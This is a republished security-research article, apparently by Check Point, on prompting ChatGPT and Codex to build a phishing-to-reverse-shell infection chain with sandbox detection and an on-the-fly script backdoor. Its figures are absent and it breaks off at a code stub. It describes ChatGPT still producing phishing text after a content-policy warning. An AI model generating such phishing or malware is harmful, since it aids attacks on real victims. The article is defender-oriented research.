OpwnAI: AI That Can Save the Day or HACK it Away

OpwnAI: AI That Can Save the Day or HACK it Away

Introduction

Due to ChatGPT, OpenAI's release of the new interface for its Large Language Model (LLM), in the last few weeks there has been an explosion of interest in General AI in the media and on social networks. This model is used in many applications all over the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also brings risks. For instance, lowering the bar for code generation can help less-skilled threat actors effortlessly launch cyber-attacks.In this article, Check Point Research demonstrates:

  • How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell.
  • How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly.
  • Examples of the positive impact of OpenAI on the defenders side and how it can help researchers in their day-to-day work.

The world of cybersecurity is rapidly changing. It is critical to emphasize the importance of remaining vigilant on how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the required entrance bar for low skilled threat actors to run phishing campaigns and to develop malware.

Background

From image generation to writing code, AI models have made tremendous progress in multiple fields with  the famous AlphaGo software beating the top professionals in the game of Go in 2016, to improved speech recognition and machine translation that brought the world virtual assistants such as Siri and Alexa that play a major role in our daily lives.

Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose "purpose is to assist with a wide range of tasks and answer questions to the best of my ability." Unless you've been disconnected from social media for the last few weeks, you've most likely seen countless images of ChatGPT interactions, from writing poetry to answering programming questions.

However, like any technology, ChatGPT's increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code.

To illustrate this point, we decided to use ChatGPT and another platform, OpenAI's Codex, an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves the following restriction: We did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack.

We chose to illustrate our point with a single execution flow, a phishing email with a malicious Excel file weaponized with macros that downloads a reverse shell (one of the favorites among cybercrime actors).

ChatGPT: The Talented Phisher

In the first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT to assist and suggested it to impersonate a hosting company.

Figure 1 – Basic phishing email generated by ChatGPT

Note that while OpenAI mentions that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT we can clarify our requirements: to avoid hosting an additional phishing infrastructure we want the target to simply download an Excel document. Simply asking ChatGPT to iterate again produces an excellent phishing email:

Figure 2 – Phishing email generated by ChatGPT

The process of iteration is essential for work with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires multiple iterations.

This is the first prompt:

Figure 3 – Simple VBA code generated by ChatGPT

This code is very naive and uses libraries such as WinHttpReq. However, after some short iteration and back and forth chatting, ChatGPT produces a better code:

Figure 4 – Another version of the VBA code

This is still a very basic macro, but we decided to stop here as obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that given good textual prompts, it can give you working malicious code.

Codex – An AI, Or the Future Name of an Implant?

Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.

We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment in the beginning of the code block.

Figure 5 – Basic reverse shell generated by Codex

This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Perhaps some scanning tools, such as checking if a service is open to SQL injection and port scanning?

Figure 6 – The most basic implementation if SQLi generated by Codex

Figure 7 – Basic port scanning script

This is also a good start, but we would also like to add some mitigations to make the defenders' lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below. Of course, it can be improved by adding other vendors and additional checks. 

Figure 8 – Basic sandbox detection script

We see that we are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we can't be sure that the infected machine will have an interpreter. To find some way to make it run natively on any Windows machine, the easiest solution might be compiling it to an exe. Once again, our AI buddies come through for us:

Figure 9 – Conversion from python to exe

And just like that, the infection flow is complete. We created a phishing email, with an attached Excel document that contains malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs, and all that's left for us to do is to execute the attack.

No Knowledge in Scripting? Don't Worry, English is Good Enough

We were curious to see how far down the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility as the attackers' needs during an intrusion might change rapidly depending on the infected environment. To see how we can leverage the AI's abilities to create code on the fly to answer this dynamic need, we created the following short Python code. After being compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterwards, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API and providing it a simple prompt in English.

import os

import sys

import openai

import argparse

import socket

import winreg

openai.api_key =

Related Stories

No stories found.
logo
Analytics Insight
www.analyticsinsight.net